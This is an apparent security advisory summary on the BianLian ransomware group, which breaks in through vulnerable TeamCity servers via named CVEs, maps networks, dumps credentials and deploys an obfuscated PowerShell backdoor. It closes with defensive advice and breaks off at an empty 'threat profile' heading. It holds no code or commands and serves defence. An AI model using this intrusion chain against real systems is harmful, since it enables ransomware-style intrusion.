BianLian Ransomware Group Leveraging JetBrains TeamCity Exploits in Ransom Campaigns

EXECUTIVE SUMMARY:

Researchers have encountered an escalating threat posed by an adversary group that has shifted its tactics towards extortion-based operations following the release of a decryptor tool by Avast. This group, previously identified as BianLian, has demonstrated a significant adaptation to changing environments, particularly in exploiting emerging vulnerabilities. In a recent incident, our team responded to an intrusion that originated from the exploitation of a vulnerable TeamCity server, showcasing the group's evolving modus operandi. In this advisory, we delve into the technical aspects of BianLian's operations, particularly focusing on their exploitation techniques and the PowerShell implementation of their backdoor.

The intrusion initiated with the exploitation of a vulnerable TeamCity server, leveraging CVE-2024-27198 /CVE-2023-42793. Following initial access, the threat actor undertook post-exploitation activities, utilizing native Windows commands to map out the victim's network infrastructure. Subsequently, they pivoted to two build servers, deploying legitimate files like winpty-agent.exe for remote command execution. Further exploitation involved the deployment of a PowerShell script, web.ps1, alongside attempts to dump credentials. Notably, BianLian shifted to a PowerShell implementation of their GO backdoor after encountering difficulties with their standard approach. The PowerShell script, though obfuscated, revealed network communication functionalities, including SSL stream utilization and TCP socket creation, indicating a sophisticated backdoor with remote access capabilities. Attribution to BianLian was established through shared infrastructure and AV detections, underscoring the threat posed by this group.

The evolving tactics of threat actors like BianLian necessitate proactive measures from organizations to mitigate risks effectively. Patching vulnerable systems, enhancing incident response capabilities, and leveraging threat intelligence are crucial strategies to combat such threats. By prioritizing preparedness and staying informed about emerging trends in the threat landscape, organizations can better protect their assets and mitigate the impact of potential attacks.

THREAT PROFILE: